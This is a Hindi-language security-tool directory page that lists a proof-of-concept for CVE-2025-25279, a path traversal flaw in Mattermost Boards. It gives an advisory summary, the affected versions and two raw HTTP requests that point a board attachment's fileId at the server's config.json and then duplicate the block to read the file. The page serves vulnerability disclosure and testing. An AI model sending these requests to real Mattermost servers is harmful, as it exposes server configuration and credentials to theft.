Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25279 — CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Mattermost Boards में पाथ ट्रैवर्सल, तैयार किए गए इम्पोर्ट आर्काइव और बोर्ड डुप्लिकेशन के माध्यम से मनमाना फ़ाइल पढ़ने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/numanturle/cve-2025-25279
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनागलत कॉन्फ़िगरेशन
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Mattermost Boards में पाथ ट्रैवर्सल, तैयार किए गए इम्पोर्ट आर्काइव और बोर्ड डुप्लिकेशन के माध्यम से मनमाना फ़ाइल पढ़ने की अनुमति देता है।

रिपॉजिटरी देखें
4231 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सुरक्षा सलाह MMSA-2025-00430 / CVE-2025-25279

सारांश

Mattermost Boards में एक फ़ाइल अपलोड करने के बाद, जब fileId पैरामीटर को संशोधित किया जाता है और बोर्ड की प्रतिलिपि बनाई जाती है, तो फ़ाइल अब पैरामीटर में निर्दिष्ट लक्ष्य फ़ाइल की ओर इंगित करती है और उसे डाउनलोड करती है।

प्रभावित संस्करण: Boards सक्षम के साथ Mattermost इंस्टेंस CVE: CVE-2025-25279

विवरण

Mattermost संस्करण 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 बोर्ड आयात करते समय बोर्ड ब्लॉक्स को ठीक से मान्य नहीं करते हैं, जिससे एक हमलावर Boards में एक विशेष रूप से तैयार आयात संग्रह को आयात और निर्यात करके सिस्टम पर किसी भी मनमानी फ़ाइल को पढ़ सकता है।

स्क्रीनशॉट

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


संदर्भ

  • Mattermost Security Updates
  • CWE-200: Information Exposure
  • CVE-2025-25279

श्रेय मेरा नहीं है, समीक्षा शामिल है

टूल डाउनलोड करें